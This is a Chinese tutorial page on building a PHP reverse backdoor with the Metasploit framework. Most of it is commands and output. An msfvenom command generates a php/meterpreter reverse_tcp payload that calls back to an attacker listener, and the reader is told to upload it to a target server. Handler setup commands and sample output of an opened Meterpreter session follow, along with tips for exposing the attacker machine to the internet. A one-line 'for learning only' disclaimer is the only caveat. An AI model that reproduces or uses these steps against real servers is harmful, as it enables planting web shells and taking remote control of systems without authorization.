设为首页 - 加入收藏 ASP站长网(Aspzz.Cn)- 科技、建站、经验、云计算、5G、大数据,站长网!
热搜: 创业者 手机 数据
当前位置: 首页 > 站长学院 > PHP教程 > 正文

metasploit框架PHP反向后门建立教程

发布时间:2022-02-24 13:00 所属栏目:121 来源:互联网
导读:Metasploit简介 灰帽黑客(第3版) Metasploit是一个免费的、可下载的框架,通过它可以很容易地获
  Metasploit简介
 
  灰帽黑客(第3版) Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户
 
  metasploit框架PHP反向后门建立
 
  msfvenom -l  查看所有payload
  Framework Payloads (436 total)
  ==============================
      Name                                                Description
      ----                                                -----------
      aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
      aix/ppc/shell_find_port                             Spawn a shell on an established connection
      aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs)
      aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell
  其他的省略。
 
  这里要使用的是PHP反向后门
 
  msfvenom -p php/meterpreter/reverse_tcp --payload-options  查看参数
  Options for payload/php/meterpreter/reverse_tcp:
  
         Name: PHP Meterpreter, PHP Reverse TCP Stager
       Module: payload/php/meterpreter/reverse_tcp
     Platform: PHP
         Arch: php
  Needs Admin: No
   Total size: 936
         Rank: Normal
  Provided by:
      egypt <egypt@metasploit.com>
  Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  LHOST                   yes       The listen address
  LPORT  4444             yes       The listen port
  Description:
    Run a meterpreter server in PHP. Reverse PHP connect back stager
    with checks for disabled functions
  msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1234 -f raw >c.php 生成脚本
 
  生成后要将脚本最前面的注释符去掉,然后上传到目标服务器上
 
  启动msf
 
  use exploit/multi/handler
 
  set PAYLOAD php/meterpreter/reverse_tcp
 
  set LHOST 192.168.1.2
 
  set LPORT 1234
 
  exploit 启动监听
 
  然后从浏览器中打开上传的脚本http://xxx.com/c.php
 
  msf中就会看到
 
  *] Starting the payload handler...
  [*] Sending stage (33068 bytes) to XXX.XXX.XXX.XXX
  [*] Meterpreter session 1 opened (192.168.1.2:1234 -> xxx.xxx.xxx.xxx:42280) at
  meterpreter >
  如果kali安装在虚拟机上,需要桥接,然后路由器上将kali DMZ到外网
 
  注意:此教程只用于学习使用其它一切后果与本站无关。

(编辑:ASP站长网)

    网友评论
    推荐文章
      热点阅读